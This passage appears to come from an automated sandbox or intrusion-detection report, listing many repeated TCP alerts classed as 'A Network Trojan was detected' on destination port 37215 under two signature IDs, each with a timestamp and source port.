              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.173304
              SID:2829579
              Source Port:37516
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.730181
              SID:2829579
              Source Port:33478
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.822457
              SID:2835222
              Source Port:60074
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.240818
              SID:2829579
              Source Port:51710
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.220172
              SID:2835222
              Source Port:42476
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.729210
              SID:2835222
              Source Port:55476
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.945660
              SID:2829579
              Source Port:55362
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.670993
              SID:2829579
              Source Port:38440
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.255665
              SID:2829579
              Source Port:49666
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.246346
              SID:2835222
              Source Port:57768
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.753422
              SID:2835222
              Source Port:41628
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.214014
              SID:2835222
              Source Port:57598
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.487240
              SID:2829579
              Source Port:47758
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.132824
              SID:2829579
              Source Port:42012
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.040778
              SID:2835222
              Source Port:53726
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.307719
              SID:2835222
              Source Port:54908
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.990741
              SID:2829579
              Source Port:59674
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.158614
              SID:2835222
              Source Port:53660
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.991237
              SID:2835222
              Source Port:50038
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.954140
              SID:2835222
              Source Port:59862
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.129861
              SID:2829579
              Source Port:50528
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.091879
              SID:2829579
              Source Port:59362
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.885634
              SID:2835222
              Source Port:38910
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.973570
              SID:2835222
              Source Port:33482
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.456564
              SID:2829579
              Source Port:58670
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.503671
              SID:2829579
              Source Port:46494
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.154115
              SID:2835222
              Source Port:41318
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.111199
              SID:2835222
              Source Port:34598
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.755946
              SID:2829579
              Source Port:34066
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.239824
              SID:2835222
              Source Port:35244
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.025419
              SID:2829579
              Source Port:55130
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.091870
              SID:2835222
              Source Port:39814
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.404201
              SID:2829579
              Source Port:46800
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.273813
              SID:2829579
              Source Port:39744
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.455920
              SID:2835222
              Source Port:38642
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.440696
              SID:2829579
              Source Port:48020
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.710986
              SID:2829579
              Source Port:60226
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.221229
              SID:2829579
              Source Port:58940
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.222216
              SID:2829579
              Source Port:43070
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.177163
              SID:2835222
              Source Port:58662
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.058422
              SID:2829579
              Source Port:46036
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.675038
              SID:2835222
              Source Port:57924
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.198113
              SID:2835222
              Source Port:59226
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.804805
              SID:2829579
              Source Port:48618
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.672072
              SID:2835222
              Source Port:42604
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.378082
              SID:2829579
              Source Port:57972
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.094771
              SID:2829579
              Source Port:40778
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.993578
              SID:2829579
              Source Port:41008
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.378398
              SID:2835222
              Source Port:43992
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.613211
              SID:2829579
              Source Port:37536
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.354325
              SID:2829579
              Source Port:39134
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.748612
              SID:2835222
              Source Port:38758
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.028275
              SID:2829579
              Source Port:35822
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.231221
              SID:2829579
              Source Port:34920
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.306689
              SID:2829579
              Source Port:55298
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.132628
              SID:2829579
              Source Port:43100
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.787417
              SID:2829579
              Source Port:45316
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.028324
              SID:2835222
              Source Port:54390
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.821614
              SID:2835222
              Source Port:42630
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.992283
              SID:2835222
              Source Port:48108
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.546924
              SID:2835222
              Source Port:51086
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.027294
              SID:2829579
              Source Port:54734
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.758326
              SID:2829579
              Source Port:60558
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.133595
              SID:2829579
              Source Port:51768
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.872409
              SID:2835222
              Source Port:37684
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.630491
              SID:2835222
              Source Port:36228
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.480799
              SID:2835222
              Source Port:37354
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.501734
              SID:2835222
              Source Port:42334
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.909065
              SID:2829579
              Source Port:57252
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.271029
              SID:2829579
              Source Port:47872
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.048462
              SID:2835222
              Source Port:56020
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.726515
              SID:2829579
              Source Port:46424
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.630121
              SID:2835222
              Source Port:37192
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.200129
              SID:2829579
              Source Port:44872
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.440350
              SID:2835222
              Source Port:46762
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.835432
              SID:2835222
              Source Port:59982
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.908139
              SID:2829579
              Source Port:54576
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.697657
              SID:2835222
              Source Port:49046
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.177214
              SID:2829579
              Source Port:57188
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.177814
              SID:2829579
              Source Port:34088
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.211934
              SID:2835222
              Source Port:32966
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.506353
              SID:2835222
              Source Port:54406
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.028666
              SID:2829579
              Source Port:57074
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.908975
              SID:2835222
              Source Port:53596
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.612691
              SID:2835222
              Source Port:60396
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.786317
              SID:2829579
              Source Port:34714
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.315886
              SID:2835222
              Source Port:34812
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.039478
              SID:2835222
              Source Port:54508
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.656459
              SID:2835222
              Source Port:56144
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.872695
              SID:2835222
              Source Port:55670
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.177441
              SID:2835222
              Source Port:59192
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.820901
              SID:2835222
              Source Port:56496
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.725586
              SID:2829579
              Source Port:46880
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.156853
              SID:2829579
              Source Port:47688
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.820517
              SID:2835222
              Source Port:48056
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.304098
              SID:2835222
              Source Port:53778
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.096347
              SID:2829579
              Source Port:44078
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.550795
              SID:2829579
              Source Port:43870
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.488311
              SID:2835222
              Source Port:35876
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.754833
              SID:2829579
              Source Port:56996
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.167194
              SID:2829579
              Source Port:48348
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.842018
              SID:2835222
              Source Port:36290
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.076312
              SID:2829579
              Source Port:42564
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.913889
              SID:2835222
              Source Port:57890
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.909490
              SID:2835222
              Source Port:58372
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.195185
              SID:2835222
              Source Port:59770
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.418616
              SID:2835222
              Source Port:48880
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.990901
              SID:2835222
              Source Port:41652
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.673899
              SID:2829579
              Source Port:37436
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.677685
              SID:2835222
              Source Port:60696
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.210584
              SID:2829579
              Source Port:37126
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.124517
              SID:2835222
              Source Port:55584
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.823175
              SID:2835222
              Source Port:47394
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.936338
              SID:2835222
              Source Port:59438
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.220203
              SID:2835222
              Source Port:50588
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.108501
              SID:2835222
              Source Port:40934
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.968963
              SID:2835222
              Source Port:49100
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.085947
              SID:2835222
              Source Port:34536
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.106167
              SID:2835222
              Source Port:37192
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.988940
              SID:2829579
              Source Port:52924
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.274437
              SID:2835222
              Source Port:39374
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.305301
              SID:2829579
              Source Port:51672
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.028492
              SID:2829579
              Source Port:51256
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.054887
              SID:2835222
              Source Port:38100
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.729418
              SID:2835222
              Source Port:43842
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.027438
              SID:2829579
              Source Port:38144
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.211519
              SID:2835222
              Source Port:51840
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.524729
              SID:2829579
              Source Port:59176
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.633189
              SID:2835222
              Source Port:40438
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.835512
              SID:2835222
              Source Port:49314
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.506728
              SID:2829579
              Source Port:41788
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.476297
              SID:2835222
              Source Port:34982
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.086247
              SID:2835222
              Source Port:50556
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.932230
              SID:2835222
              Source Port:53580
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.192872
              SID:2829579
              Source Port:42500
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.803811
              SID:2835222
              Source Port:58888
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.676198
              SID:2829579
              Source Port:45406
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.974060
              SID:2829579
              Source Port:43288
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.177398
              SID:2829579
              Source Port:57144
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.728389
              SID:2829579
              Source Port:45692
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.835374
              SID:2829579
              Source Port:54426
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.801205
              SID:2835222
              Source Port:32840
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.028404
              SID:2829579
              Source Port:58456
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.674912
              SID:2835222
              Source Port:53522
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.476058
              SID:2835222
              Source Port:39790
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.671147
              SID:2829579
              Source Port:48174
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.484452
              SID:2829579
              Source Port:54376
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.372158
              SID:2829579
              Source Port:46830
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.176589
              SID:2835222
              Source Port:44610
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.440722
              SID:2835222
              Source Port:47340
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.372349
              SID:2835222
              Source Port:38386
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.211318
              SID:2835222
              Source Port:42940
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.933522
              SID:2829579
              Source Port:55486
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.096196
              SID:2829579
              Source Port:45982
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.040936
              SID:2829579
              Source Port:40322
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.611448
              SID:2835222
              Source Port:51532
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.180479
              SID:2835222
              Source Port:38772
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.304884
              SID:2835222
              Source Port:58976
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.821453
              SID:2835222
              Source Port:57428
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.707435
              SID:2835222
              Source Port:37308
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.485522
              SID:2829579
              Source Port:38012
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.401904
              SID:2835222
              Source Port:37112
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.605755
              SID:2829579
              Source Port:55796
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.359212
              SID:2829579
              Source Port:58934
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.694481
              SID:2835222
              Source Port:44446
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.124694
              SID:2835222
              Source Port:57838
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.453861
              SID:2835222
              Source Port:45742
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.696893
              SID:2829579
              Source Port:34928
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.488635
              SID:2829579
              Source Port:55996
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.968257
              SID:2835222
              Source Port:57826
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.181809
              SID:2829579
              Source Port:50424
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.048811
              SID:2835222
              Source Port:53042
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.800360
              SID:2829579
              Source Port:41042
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.358226
              SID:2829579
              Source Port:38272
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.612368
              SID:2835222
              Source Port:49686
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.839595
              SID:2835222
              Source Port:42724
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.570266
              SID:2835222
              Source Port:40920
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.307755
              SID:2829579
              Source Port:54356
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.110446
              SID:2835222
              Source Port:56324
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.730718
              SID:2835222
              Source Port:41984
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.348865
              SID:2835222
              Source Port:40288
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.631340
              SID:2835222
              Source Port:57174
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.833441
              SID:2829579
              Source Port:52070
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.726931
              SID:2835222
              Source Port:59232
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.696253
              SID:2835222
              Source Port:35502
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.302009
              SID:2829579
              Source Port:51814
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.089764
              SID:2835222
              Source Port:59452
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.407345
              SID:2829579
              Source Port:46822
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.458099
              SID:2829579
              Source Port:40908
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.552588
              SID:2835222
              Source Port:52532
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.758716
              SID:2829579
              Source Port:53724
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.014523
              SID:2829579
              Source Port:37594
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.678996
              SID:2829579
              Source Port:54172
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.552762
              SID:2829579
              Source Port:54762
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.996353
              SID:2835222
              Source Port:42724
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.212372
              SID:2835222
              Source Port:56296
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.010152
              SID:2829579
              Source Port:35782
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
